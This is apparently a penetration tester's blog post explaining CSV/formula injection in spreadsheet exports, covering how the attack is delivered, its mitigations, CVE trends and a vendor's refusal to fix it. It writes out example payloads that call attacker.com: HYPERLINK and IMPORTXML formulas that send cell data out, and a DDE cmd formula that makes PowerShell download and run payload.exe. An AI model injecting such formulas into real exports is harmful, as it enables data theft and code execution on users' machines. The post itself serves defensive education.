Since the beginning of the 21th century, attackers use macro on Office files in order to infect their victims. Macros allow code execution on victim’s workstation, the VBA script used is more often obfuscated in order to make more difficult the analysis by antivirus and reverser. After this massive use of macro, this one was disable by default, asking the user if he wants to execute it and warning it in case of file downloaded from internet or not signed. This way is still used by attacker but more often caught by antivirus and web or mail gateway.
There is two ways of attack possible.
The first one comes from, like as usual, email with a message in order to influence the user to open the document. Due to awareness, users are more vigilant against file coming from unknown sender.
The second method comes from a vulnerability on a website that the user trusts, like the internal ticketing software or a software used by all the company. However, the scope is not the same as sending an email. This method requires a user interaction with the vulnerable functionality.
The attack consists to inject some data, via a form for example, which will be added on a CSV file via an export function. When the CSV file is downloaded and opened with Excel by the target, this one will execute function starting with a special char. For example if a cell contains ‘=SUM(A1:A4)’, Excel will compute the sum for the given cells without asking the user. With this behaviour, attackers can use other function like HYPERLINK or CMD.
HYPERLINK: This function takes two arguments, the destination URL and the text displayed on the cell. The URL parameter can take a list of cells as argument like the following example. This allows to the attacker to extract data and redirect the user to a malicious website. This command does not allow code execution on the victim workstation (or not directly).
=HYPERLINK(“http://attacker.com?data=”A1&A2&A3, “Click here to see the error”)
IMPORTXML: This function allows Excel to import an XML sheet containing other payloads. These payloads could be undetectable if the antivirus does not check the content of the XML file. Moreover, as this function takes an URL as argument, it is possible to extract data like the HYPERLINK function but without user interaction. The CONCATENATE function allows to merge multiple cells without specification of each one like the previous example.
=IMPORTXML(CONCAT(“http://attacker.com?data=“, CONCATENATE(A2:A20)), “//a/a10”)
DDE: This function uses DDE in order to call other methods of other software of the Office solution. This one could be used in order to open file or call a software like the following example. On this example, the DDE function calls the cmd with the calc tool.
CMD: This second command is the most interesting for an attacker point of view. This allows executing a command on the workstation. The command can call all type of executables on the workstation, like a browser, a specific tool use by the company or the CMD or PowerShell. This is the last example, which is the most used by attackers. The following example allows downloading and executing a file with PowerShell:
=cmd|’ /C powershell IEX(wget http://attacker.com/payload.exe)’!A0
The file payload.exe will be downloaded and executed on victim’s workstation. As the DDE is disabled by default and could be totally disabled by a key on the Windows registry, the CMD command cannot be completely switched off.
On client side, Excel shows a popup advertising the user that a command will be launched. However, with some social engineering skills and a good scenario, it is still possible to force the user to accept popups and execute the payload.
On application side, if the injection comes from a user input, it is possible to escape or remove some character before generating the CSV. The condition to run these functions is that the cell needs to start with a “+”, “-“, “=” or “@”. Therefore, it is possible to remove these characters if it is the first of the cell. Another solution is the addition of a space before the text. The space will prevent Excel to execute the payload and the data given by the user stay the same, but the cell need to be properly quoted.
In real life
Even if Excel triggers the code execution, some vendors patch this vulnerability in order to provide more security for their users. However, some vendors do not want to associate this vulnerability to their software but to Excel, which is questionable.
The number of CVE about CSV or Formula injection skyrocketed since the end of 2017.
|Year||Number of CVE*|
*The count is based on the published CVE text. Some of them could be private or not released and so not included on these statistics.
This type of issue could be found on GitHub for example. Numbers of projects possess the issue “CSV injection” or “Formula injection”. Some user does not report the vulnerability with a CVE, but for example, they open an issue on the GitHub project if it is possible and ask for patching this point. Some of these contributors take care about the issue of CSV injection but it is not a general behaviour. The argument is to reject the fault on Excel software.
In August 2018, one of our pentester faced to this kind of issue and discussion with Jira[JIRA]. A CSV injection was found on the export function, but Jira did not want to patch this injection and rejected the fault to Excel and Microsoft. This issue will not be fixed as Jira does not want to do it.
Microsoft patched this issue by displaying a popup, but without user awareness and with some social engineering skills, users can still allow the execution and be infected. Application must mitigate this risk by adding a quote in front of cells or by filtering some special characters. However, not all vendors or contributors want to fix this kind of issue. If you develop this kind of functionalities, be sure that this injection is mitigated in order to improve the security of your users.